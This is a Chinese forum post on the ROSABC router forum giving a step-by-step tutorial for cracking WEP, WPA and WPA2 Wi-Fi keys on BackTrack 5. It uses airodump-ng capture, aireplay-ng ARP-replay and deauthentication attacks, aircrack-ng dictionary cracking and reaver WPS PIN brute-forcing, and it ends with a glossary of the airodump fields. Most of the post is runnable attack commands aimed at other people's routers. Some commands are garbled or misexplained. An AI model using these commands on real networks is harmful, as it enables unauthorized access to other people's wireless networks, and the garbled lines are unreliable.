对于无线网密钥进行破解,玩了快一个月了,软件都是基于linux系统的,BT系列也是linux系统的一个分支(很专业的网络检测系统),也试过CDlinux9.6和Beini五合一版本(网上据说不再更新了),最后还是选择了BT5 R2。 1. wep加密破解: ifconfig -a 查看所有的网卡 ifconfig wlan0 up 激活无线网卡 airmonairmon -ng start 设置无线网卡模式 airodump-ng mon0 查看无线网络信息 airodump-ng --ivs -w akast -c 6 mon0 抓包(-c是指频道,后面跟着我要破解的路由器的信号频道,也就是6) aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-b后面跟着的是目标MAC地址。-h后面跟着的是本机的无线网卡MAC地址。) aircrack-ng akast*.ivs 开始破解 2.wpa或wpa2破解(其实这两种加密方式并没有被完全破解,能破解运气占很大的成分) 第一种是抓包后跑字典 ifconfig -a 查看所有的网卡 ifconfig wlan0 up 激活无线网卡 airmonairmon -ng start 设置无线网卡模式 airodump-ng mon0 查看无线网络信息 airodump-ng -w akast -c 6 mon0 抓包 aireplay-ng -0 1 -a 00:21:27:63:41:CE -c 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-a后面跟着的是目标MAC地址。-c后面跟着的是本机的无线网卡MAC地址。) aircrack-ng -w 密码字典akast*.cap 开始破解 backtrack自带的密码列表:/pentest/wireless/aircrack-ng/lest/password.lst 也可以在windows下用EWSA跑字典(利用CPU和GPU的,我电脑立马出现问题,不建议) 第二种方法利用reaver进行pin解(也不是很可靠,拼人品的) ifconfig -a 查看所有的网卡 ifconfig wlan0 up 激活无线网卡 airmonairmon -ng start 设置无线网卡模式 airodump-ng mon0 查看无线网络信息 wash -i mon0 -C reaver -i mon0 -b MAC地址 -a -S -vv(如果出现timeout或者trying pin 12345670后不动了,可以重新试试) 接下来说说其中有些英文表示的意思(不愿意看的直接略过) AP(无线网) BSSID——这个就是路由器的MAC地址了。 PWR——这个是信号强度。 Beacons——这个是路由器对外发包,可能是SSID广播。 #Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击。 #/s——DATA增加的速度。 CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。 MB——无线的速度,现在一般都是54MB的了。 CIPHER——加密方式。 AUTH——这个应该是authorization的缩写,也就是授权的意思。 ESSID——简单理解,这个就是路由器的名字了。 最后说一句,最好有客户端在线(即有人在使用中),不然没有Data,平添不少难度。(feedbottle似乎可以,不过伪连对于信号要求似乎很高,我的小USB网卡能伪连,却无法发送数据包,郁闷!) (作者:野猫) |
不良信息举报Q:2000617|Archiver|ROS软路由论坛 ROSABC.com 网络方案网络工程交流
GMT+8, 2024-11-1 11:29 , Processed in 0.041332 second(s), 15 queries .
Powered by Discuz! X3.4
Copyright © 2001-2021, Tencent Cloud.
